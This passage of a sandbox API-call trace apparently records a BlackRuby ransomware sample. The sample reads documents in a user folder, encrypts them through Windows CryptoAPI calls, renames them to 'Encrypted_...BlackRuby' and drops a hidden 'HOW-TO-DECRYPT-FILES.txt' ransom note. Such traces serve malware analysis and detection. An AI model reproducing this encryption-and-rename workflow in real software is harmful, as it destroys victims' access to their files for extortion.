dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.373] GetLastError () returned 0x5 [0058.374] SetErrorMode (uMode=0x0) returned 0x1 [0058.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", lpFilePart=0x0) returned 0x38 [0058.374] GetLastError () returned 0x5 [0058.374] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.374] GetLastError () returned 0x5 [0058.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0058.375] GetLastError () returned 0x5 [0058.375] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", lpFilePart=0x0) returned 0x38 [0058.375] GetLastError () returned 0x5 [0058.375] SetErrorMode (uMode=0x1) returned 0x0 [0058.375] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0058.375] GetLastError () returned 0x5 [0058.375] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.375] GetLastError () returned 0x5 [0058.375] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.375] GetLastError () returned 0x5 [0058.375] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.375] GetLastError () returned 0x5 [0058.375] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.375] GetLastError () returned 0x5 [0058.375] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.375] GetLastError () returned 0x5 [0058.376] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.376] GetLastError () returned 0x5 [0058.376] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.376] GetLastError () returned 0x12 [0058.376] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0058.376] SetErrorMode (uMode=0x0) returned 0x1 [0058.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj", lpFilePart=0x0) returned 0x38 [0058.376] GetLastError () returned 0x12 [0058.376] SetErrorMode (uMode=0x1) returned 0x0 [0058.376] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0058.376] GetLastError () returned 0x12 [0058.376] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.376] GetLastError () returned 0x12 [0058.376] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.376] GetLastError () returned 0x12 [0058.376] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.376] GetLastError () returned 0x12 [0058.377] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.377] GetLastError () returned 0x12 [0058.377] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.377] GetLastError () returned 0x12 [0058.377] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0058.377] GetLastError () returned 0x12 [0058.377] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0058.377] GetLastError () returned 0x12 [0058.377] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0058.377] SetErrorMode (uMode=0x0) returned 0x1 [0058.377] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.377] GetLastError () returned 0x12 [0058.377] SetErrorMode (uMode=0x1) returned 0x0 [0058.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1b94634 | out: lpFileInformation=0x1b94634*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49daece0, ftCreationTime.dwHighDateTime=0x1d350c5, ftLastAccessTime.dwLowDateTime=0xf1338320, ftLastAccessTime.dwHighDateTime=0x1d35625, ftLastWriteTime.dwLowDateTime=0xf1338320, ftLastWriteTime.dwHighDateTime=0x1d35625, nFileSizeHigh=0x0, nFileSizeLow=0xbb18)) returned 1 [0058.377] GetLastError () returned 0x12 [0058.377] SetErrorMode (uMode=0x0) returned 0x1 [0058.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.378] GetLastError () returned 0x12 [0058.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.378] GetLastError () returned 0x12 [0058.378] SetErrorMode (uMode=0x1) returned 0x0 [0058.378] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.378] GetLastError () returned 0x0 [0058.378] GetFileType (hFile=0x184) returned 0x1 [0058.378] SetErrorMode (uMode=0x0) returned 0x1 [0058.378] GetFileType (hFile=0x184) returned 0x1 [0058.378] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0xbb18 [0058.378] GetLastError () returned 0x0 [0058.378] ReadFile (in: hFile=0x184, lpBuffer=0x1b967d0, nNumberOfBytesToRead=0xbb18, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1b967d0*, lpNumberOfBytesRead=0x18ecac*=0xbb18, lpOverlapped=0x0) returned 1 [0058.379] GetLastError () returned 0x0 [0058.379] CloseHandle (hObject=0x184) returned 1 [0058.379] GetLastError () returned 0x0 [0058.379] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.379] GetLastError () returned 0x0 [0058.379] SetErrorMode (uMode=0x1) returned 0x0 [0058.379] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49daece0, ftCreationTime.dwHighDateTime=0x1d350c5, ftLastAccessTime.dwLowDateTime=0xf1338320, ftLastAccessTime.dwHighDateTime=0x1d35625, ftLastWriteTime.dwLowDateTime=0xf1338320, ftLastWriteTime.dwHighDateTime=0x1d35625, nFileSizeHigh=0x0, nFileSizeLow=0xbb18)) returned 1 [0058.379] GetLastError () returned 0x0 [0058.379] SetErrorMode (uMode=0x0) returned 0x1 [0058.379] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c818) returned 1 [0058.380] GetLastError () returned 0x0 [0058.413] CryptImportKey (in: hProv=0x37c818, pbData=0x1c081e0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b60) returned 1 [0058.413] GetLastError () returned 0x0 [0058.413] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.413] GetLastError () returned 0x0 [0058.418] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.418] GetLastError () returned 0x0 [0058.418] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ea0) returned 1 [0058.418] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.418] GetLastError () returned 0x0 [0058.418] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1c3522c*=0x1, dwFlags=0x0) returned 1 [0058.418] GetLastError () returned 0x0 [0058.418] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1c351f8, dwFlags=0x0) returned 1 [0058.418] GetLastError () returned 0x0 [0058.418] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c35274*, pdwDataLen=0x18ec9c*=0xbc10, dwBufLen=0xbc10 | out: pbData=0x1c35274*, pdwDataLen=0x18ec9c*=0xbc10) returned 1 [0058.419] GetLastError () returned 0x0 [0058.419] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4cac0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c4cac0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0058.419] GetLastError () returned 0x0 [0058.419] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4caf0*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c4caf0*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0058.419] GetLastError () returned 0x0 [0058.419] CryptDestroyKey (hKey=0x360b60) returned 1 [0058.419] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.419] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.419] GetLastError () returned 0x0 [0058.419] SetErrorMode (uMode=0x1) returned 0x0 [0058.419] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.421] GetLastError () returned 0xb7 [0058.421] GetFileType (hFile=0x184) returned 0x1 [0058.421] SetErrorMode (uMode=0x0) returned 0x1 [0058.421] GetFileType (hFile=0x184) returned 0x1 [0058.422] CloseHandle (hObject=0x184) returned 1 [0058.422] GetLastError () returned 0xb7 [0058.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx", lpFilePart=0x0) returned 0x46 [0058.422] GetLastError () returned 0xb7 [0058.422] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_EWoZMYKgcjbSwRGlhu9w8m8LMbA6g1u8wYhM4D8wbLmc3X.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_EWoZMYKgcjbSwRGlhu9w8m8LMbA6g1u8wYhM4D8wbLmc3X.BlackRuby", lpFilePart=0x0) returned 0x7b [0058.422] GetLastError () returned 0xb7 [0058.422] SetErrorMode (uMode=0x1) returned 0x0 [0058.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49daece0, ftCreationTime.dwHighDateTime=0x1d350c5, ftLastAccessTime.dwLowDateTime=0xf1338320, ftLastAccessTime.dwHighDateTime=0x1d35625, ftLastWriteTime.dwLowDateTime=0x2b034d60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xbc20)) returned 1 [0058.422] GetLastError () returned 0xb7 [0058.422] SetErrorMode (uMode=0x0) returned 0x1 [0058.422] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\AfAy5mmq.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\afay5mmq.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_EWoZMYKgcjbSwRGlhu9w8m8LMbA6g1u8wYhM4D8wbLmc3X.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\encrypted_ewozmykgcjbswrglhu9w8m8lmba6g1u8wyhm4d8wblmc3x.blackruby")) returned 1 [0058.423] GetLastError () returned 0xb7 [0058.423] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x51 [0058.423] GetLastError () returned 0xb7 [0058.423] SetErrorMode (uMode=0x1) returned 0x0 [0058.423] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.425] GetLastError () returned 0x0 [0058.425] GetFileType (hFile=0x184) returned 0x1 [0058.425] SetErrorMode (uMode=0x0) returned 0x1 [0058.425] GetFileType (hFile=0x184) returned 0x1 [0058.426] CloseHandle (hObject=0x184) returned 1 [0058.426] GetLastError () returned 0x0 [0058.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x51 [0058.426] GetLastError () returned 0x0 [0058.426] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0058.426] GetLastError () returned 0x0 [0058.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", lpFilePart=0x0) returned 0x4b [0058.426] GetLastError () returned 0x0 [0058.426] SetErrorMode (uMode=0x1) returned 0x0 [0058.426] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\sp6zj9akigbjuv.pps"), fInfoLevelId=0x0, lpFileInformation=0x1c756c8 | out: lpFileInformation=0x1c756c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f0727c0, ftCreationTime.dwHighDateTime=0x1d35132, ftLastAccessTime.dwLowDateTime=0x50dc2c10, ftLastAccessTime.dwHighDateTime=0x1d34a72, ftLastWriteTime.dwLowDateTime=0x50dc2c10, ftLastWriteTime.dwHighDateTime=0x1d34a72, nFileSizeHigh=0x0, nFileSizeLow=0x10595)) returned 1 [0058.426] GetLastError () returned 0x0 [0058.426] SetErrorMode (uMode=0x0) returned 0x1 [0058.427] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", lpFilePart=0x0) returned 0x4b [0058.427] GetLastError () returned 0x0 [0058.427] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", lpFilePart=0x0) returned 0x4b [0058.427] GetLastError () returned 0x0 [0058.427] SetErrorMode (uMode=0x1) returned 0x0 [0058.427] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\sp6zj9akigbjuv.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.427] GetLastError () returned 0x0 [0058.427] GetFileType (hFile=0x184) returned 0x1 [0058.427] SetErrorMode (uMode=0x0) returned 0x1 [0058.427] GetFileType (hFile=0x184) returned 0x1 [0058.427] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x10595 [0058.427] GetLastError () returned 0x0 [0058.427] ReadFile (in: hFile=0x184, lpBuffer=0x1c7738c, nNumberOfBytesToRead=0x10595, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c7738c*, lpNumberOfBytesRead=0x18ecac*=0x10595, lpOverlapped=0x0) returned 1 [0058.428] GetLastError () returned 0x0 [0058.428] CloseHandle (hObject=0x184) returned 1 [0058.428] GetLastError () returned 0x0 [0058.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", lpFilePart=0x0) returned 0x4b [0058.428] GetLastError () returned 0x0 [0058.428] SetErrorMode (uMode=0x1) returned 0x0 [0058.428] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\sp6zj9akigbjuv.pps"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f0727c0, ftCreationTime.dwHighDateTime=0x1d35132, ftLastAccessTime.dwLowDateTime=0x50dc2c10, ftLastAccessTime.dwHighDateTime=0x1d34a72, ftLastWriteTime.dwLowDateTime=0x50dc2c10, ftLastWriteTime.dwHighDateTime=0x1d34a72, nFileSizeHigh=0x0, nFileSizeLow=0x10595)) returned 1 [0058.428] GetLastError () returned 0x0 [0058.428] SetErrorMode (uMode=0x0) returned 0x1 [0058.439] CryptImportKey (in: hProv=0x37c790, pbData=0x1cf22b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360de0) returned 1 [0058.439] GetLastError () returned 0x0 [0058.439] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.439] GetLastError () returned 0x0 [0058.444] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.444] GetLastError () returned 0x0 [0058.444] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ce0) returned 1 [0058.444] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.444] GetLastError () returned 0x0 [0058.444] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1d1f2fc*=0x1, dwFlags=0x0) returned 1 [0058.444] GetLastError () returned 0x0 [0058.444] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1d1f2c8, dwFlags=0x0) returned 1 [0058.444] GetLastError () returned 0x0 [0058.444] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d1f344*, pdwDataLen=0x18ec9c*=0x10690, dwBufLen=0x10690 | out: pbData=0x1d1f344*, pdwDataLen=0x18ec9c*=0x10690) returned 1 [0058.445] GetLastError () returned 0x0 [0058.445] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d40090*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1d40090*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0058.445] GetLastError () returned 0x0 [0058.445] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d400c0*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1d400c0*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0058.445] GetLastError () returned 0x0 [0058.448] CryptDestroyKey (hKey=0x360de0) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.448] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps", lpFilePart=0x0) returned 0x4b [0058.448] GetLastError () returned 0x0 [0058.448] SetErrorMode (uMode=0x1) returned 0x0 [0058.450] GetFileType (hFile=0x184) returned 0x1 [0058.450] SetErrorMode (uMode=0x0) returned 0x1 [0058.450] GetFileType (hFile=0x184) returned 0x1 [0058.450] WriteFile (in: hFile=0x184, lpBuffer=0x1b480a8*, nNumberOfBytesToWrite=0x106a0, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x1b480a8*, lpNumberOfBytesWritten=0x18ecb8*=0x106a0, lpOverlapped=0x0) returned 1 [0058.451] GetLastError () returned 0xb7 [0058.451] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Sp6Zj9AKigBJUV.pps" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\sp6zj9akigbjuv.pps"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\Encrypted_Qr4ZXKQLUP15Cqyp9a9BKFmQEuaCctF4VCNiJpK.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\encrypted_qr4zxkqlup15cqyp9a9bkfmqeuacctf4vcnijpk.blackruby")) returned 1 [0058.452] GetLastError () returned 0xb7 [0058.453] SetErrorMode (uMode=0x0) returned 0x1 [0058.453] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\ty9iPs7-_h2faCXRkdwK.xls", lpFilePart=0x0) returned 0x51 [0058.453] GetLastError () returned 0x5 [0058.453] SetErrorMode (uMode=0x1) returned 0x0 [0058.453] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A 